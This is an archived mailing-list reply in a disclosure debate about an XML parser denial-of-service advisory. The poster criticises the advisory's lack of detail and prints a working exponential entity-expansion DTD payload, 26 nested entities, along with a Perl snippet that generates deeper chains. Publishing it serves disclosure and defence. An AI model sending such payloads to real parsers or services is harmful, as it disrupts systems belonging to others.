[<prev] [next>] [day] [month] [year] [list]
Message-ID: <86el8h7jib.fsf@home.nest.cx>
From: greg-fulldisclosure at nest.cx (Gregory Steuck)
Subject: Re: Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD
>>>>> "Amit" == Amit Klein <Amit.Klein@...ctumInc.com> writes:
Amit> Multiple vendors XML parser (and SOAP/WebServices server)
Amit> Denial of Service attack using DTD
Nice work SanctumInc! Great piece of non-disclosure! It's posts like
this one that make Bugtraq a cheap brand name peddling place.
Amit> - Other products from other vendors are known to be
Amit> vulnerable too
Perfect, and since we are not told what the vulnerability is, we are
left vulnerable without any way to find out where the problem lies.
Fortunately, it doesn't take a rocket scientist to devise a DTD that
takes exponential time to process without consuming a lot of memory.
Did you have this one in mind?
<?xml version="1.0"?>
<!--
for ($i=1; $i < $ARGV[0]; $i++) {
$j = $i - 1;
print <<EOF;
<!ENTITY a$i "&a$j;&a$j;">
EOF
}
-->
<!DOCTYPE a [
<!ENTITY a0 "">
<!ENTITY a1 "&a0;&a0;">
<!ENTITY a2 "&a1;&a1;">
<!ENTITY a3 "&a2;&a2;">
<!ENTITY a4 "&a3;&a3;">
<!ENTITY a5 "&a4;&a4;">
<!ENTITY a6 "&a5;&a5;">
<!ENTITY a7 "&a6;&a6;">
<!ENTITY a8 "&a7;&a7;">
<!ENTITY a9 "&a8;&a8;">
<!ENTITY a10 "&a9;&a9;">
<!ENTITY a11 "&a10;&a10;">
<!ENTITY a12 "&a11;&a11;">
<!ENTITY a13 "&a12;&a12;">
<!ENTITY a14 "&a13;&a13;">
<!ENTITY a15 "&a14;&a14;">
<!ENTITY a16 "&a15;&a15;">
<!ENTITY a17 "&a16;&a16;">
<!ENTITY a18 "&a17;&a17;">
<!ENTITY a19 "&a18;&a18;">
<!ENTITY a20 "&a19;&a19;">
<!ENTITY a21 "&a20;&a20;">
<!ENTITY a22 "&a21;&a21;">
<!ENTITY a23 "&a22;&a22;">
<!ENTITY a24 "&a23;&a23;">
<!ENTITY a25 "&a24;&a24;">
]>
<a>&a0;</a>
Uh-oh, turns out it's the way DTD is supposed to work, not an
implementation defect.
Powered by blists - more mailing lists